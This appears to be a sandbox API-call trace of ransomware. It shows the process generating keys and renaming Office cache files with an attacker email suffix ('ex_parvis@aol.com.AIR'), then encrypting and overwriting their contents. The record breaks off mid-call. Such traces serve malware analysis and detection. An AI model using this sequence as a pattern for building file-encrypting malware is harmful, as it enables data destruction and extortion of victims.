WriteFile (in: hFile=0x49c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0143.277] WriteFile (in: hFile=0x49c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0143.277] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x6a3b) returned 0x3a7410 [0143.277] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x6a3b) returned 0x3ade58 [0143.277] SetFilePointer (in: hFile=0x49c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.277] ReadFile (in: hFile=0x49c, lpBuffer=0x3a7410, nNumberOfBytesToRead=0x6a3b, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3a7410*, lpNumberOfBytesRead=0x2acf9c8*=0x6a3b, lpOverlapped=0x0) returned 1 [0143.278] SetFilePointer (in: hFile=0x49c, lDistanceToMove=-27195, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.278] WriteFile (in: hFile=0x49c, lpBuffer=0x3ade58*, nNumberOfBytesToWrite=0x6a3b, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3ade58*, lpNumberOfBytesWritten=0x2acf9c8*=0x6a3b, lpOverlapped=0x0) returned 1 [0143.278] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7410 | out: hHeap=0x2e0000) returned 1 [0143.278] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3ade58 | out: hHeap=0x2e0000) returned 1 [0143.278] CloseHandle (hObject=0x49c) returned 1 [0143.279] GetProcessHeap () returned 0x2e0000 [0143.279] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0143.279] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0143.279] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0143.279] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385ab8 | out: hHeap=0x2e0000) returned 1 [0143.279] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385a10 | out: hHeap=0x2e0000) returned 1 [0143.279] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385a10 [0143.279] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0143.279] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0143.279] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0143.279] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0143.279] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll", dwFileAttributes=0x80) returned 1 [0143.280] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 76 [0143.280] GetProcessHeap () returned 0x2e0000 [0143.280] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfe) returned 0x363a50 [0143.280] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" [0143.280] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll.12781717671972518758.ex_parvis@aol.com.AIR" [0143.280] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0143.283] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x49c [0143.283] GetProcessHeap () returned 0x2e0000 [0143.283] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0143.283] GetFileSizeEx (in: hFile=0x49c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=191872) returned 1 [0143.283] SetFilePointer (in: hFile=0x49c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x2ed80 [0143.284] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0143.284] GetProcessHeap () returned 0x2e0000 [0143.284] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0143.284] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0143.284] WriteFile (in: hFile=0x49c, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0143.285] WriteFile (in: hFile=0x49c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0143.285] WriteFile (in: hFile=0x49c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0143.285] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x2ed80) returned 0x30d0048 [0143.287] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x2ed80) returned 0x30fedd0 [0143.287] SetFilePointer (in: hFile=0x49c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.287] ReadFile (in: hFile=0x49c, lpBuffer=0x30d0048, nNumberOfBytesToRead=0x2ed80, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0048*, lpNumberOfBytesRead=0x2acf9c8*=0x2ed80, lpOverlapped=0x0) returned 1 [0143.293] SetFilePointer (in: hFile=0x49c, lDistanceToMove=-191872, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.293] WriteFile (in: hFile=0x49c, lpBuffer=0x30fedd0*, nNumberOfBytesToWrite=0x2ed80, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30fedd0*, lpNumberOfBytesWritten=0x2acf9c8*=0x2ed80, lpOverlapped=0x0) returned 1 [0143.293] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30d0048 | out: hHeap=0x2e0000) returned 1 [0143.293] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30fedd0 | out: hHeap=0x2e0000) returned 1 [0143.293] CloseHandle (hObject=0x49c) returned 1 [0143.295] GetProcessHeap () returned 0x2e0000 [0143.295] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0143.295] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0143.295] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0143.295] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385a10 | out: hHeap=0x2e0000) returned 1 [0143.295] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385968 | out: hHeap=0x2e0000) returned 1 [0143.295] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xb0) returned 0x33acb8 [0143.295] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0143.296] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0143.296] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0143.296] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0143.296] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml", dwFileAttributes=0x80) returned 1 [0143.296] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 80 [0143.296] GetProcessHeap () returned 0x2e0000 [0143.296] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x106) returned 0x3a7410 [0143.296] lstrcpyW (in: lpString1=0x3a7410, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" [0143.296] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.12781717671972518758.ex_parvis@aol.com.AIR" [0143.297] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0143.299] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x49c [0143.299] GetProcessHeap () returned 0x2e0000 [0143.300] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7410 | out: hHeap=0x2e0000) returned 1 [0143.300] GetFileSizeEx (in: hFile=0x49c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=819) returned 1 [0143.300] SetFilePointer (in: hFile=0x49c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x333 [0143.300] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0143.300] GetProcessHeap () returned 0x2e0000 [0143.300] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0143.300] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0143.300] WriteFile (in: hFile=0x49c, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0143.301] WriteFile (in: hFile=0x49c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0143.301] WriteFile (in: hFile=0x49c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0143.302] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x333) returned 0x3a7410 [0143.302] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x333) returned 0x3a7750 [0143.302] SetFilePointer (in: hFile=0x49c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.302] ReadFile (in: hFile=0x49c, lpBuffer=0x3a7410, nNumberOfBytesToRead=0x333, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3a7410*, lpNumberOfBytesRead=0x2acf9c8*=0x333, lpOverlapped=0x0) returned 1 [0143.302] SetFilePointer (in: hFile=0x49c, lDistanceToMove=-819, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.302] WriteFile (in: hFile=0x49c, lpBuffer=0x3a7750*, nNumberOfBytesToWrite=0x333, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3a7750*, lpNumberOfBytesWritten=0x2acf9c8*=0x333, lpOverlapped=0x0) returned 1 [0143.302] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7410 | out: hHeap=0x2e0000) returned 1 [0143.302] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7750 | out: hHeap=0x2e0000) returned 1 [0143.302] CloseHandle (hObject=0x49c) returned 1 [0143.302] GetProcessHeap () returned 0x2e0000 [0143.302] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0143.302] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0143.303] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0143.303] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33acb8 | out: hHeap=0x2e0000) returned 1 [0143.303] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33ac00 | out: hHeap=0x2e0000) returned 1 [0143.303] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xb0) returned 0x33ac00 [0143.303] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0143.303] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0143.303] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0143.303] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0143.303] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi", dwFileAttributes=0x80) returned 1 [0143.303] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 80 [0143.303] GetProcessHeap () returned 0x2e0000 [0143.303] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x106) returned 0x3a7410 [0143.303] lstrcpyW (in: lpString1=0x3a7410, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" [0143.304] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi.12781717671972518758.ex_parvis@aol.com.AIR" [0143.304] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0143.306] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x49c [0143.306] GetProcessHeap () returned 0x2e0000 [0143.306] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7410 | out: hHeap=0x2e0000) returned 1 [0143.306] GetFileSizeEx (in: hFile=0x49c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=868864) returned 1 [0143.306] SetFilePointer (in: hFile=0x49c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xd4200 [0143.306] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0143.306] GetProcessHeap () returned 0x2e0000 [0143.306] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0143.306] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0143.307] WriteFile (in: hFile=0x49c, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0143.309] WriteFile (in: hFile=0x49c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0143.309] WriteFile (in: hFile=0x49c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0143.309] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd4200) returned 0x31d0020 [0143.309] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd4200) returned 0x32b0020 [0143.310] SetFilePointer (in: hFile=0x49c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.310] ReadFile (in: hFile=0x49c, lpBuffer=0x31d0020, nNumberOfBytesToRead=0xd4200, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d0020*, lpNumberOfBytesRead=0x2acf9c8*=0xd4200, lpOverlapped=0x0) returned 1 [0143.342] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0143.342] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0143.342] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml", dwFileAttributes=0x80) returned 1 [0143.343] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 77 [0143.343] GetProcessHeap () returned 0x2e0000 [0143.343] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363a50 [0143.343] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" [0143.343] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" [0143.344] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0143.346] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x49c [0143.346] GetProcessHeap () returned 0x2e0000 [0143.346] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0143.346] GetFileSizeEx (in: hFile=0x49c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=5557) returned 1 [0143.347] SetFilePointer (in: hFile=0x49c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x15b5 [0143.347] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0143.347] GetProcessHeap () returned 0x2e0000 [0143.347] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0143.347] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0143.347] WriteFile (in: hFile=0x49c, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0143.348] WriteFile (in: hFile=0x49c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0143.348] WriteFile (in: hFile=0x49c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0143.348] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x15b5) returned 0x3a7410 [0143.349] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x15b5) returned 0x3a89d0 [0143.349] SetFilePointer (in: hFile=0x49c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.349] ReadFile (in: hFile=0x49c, lpBuffer=0x3a7410, 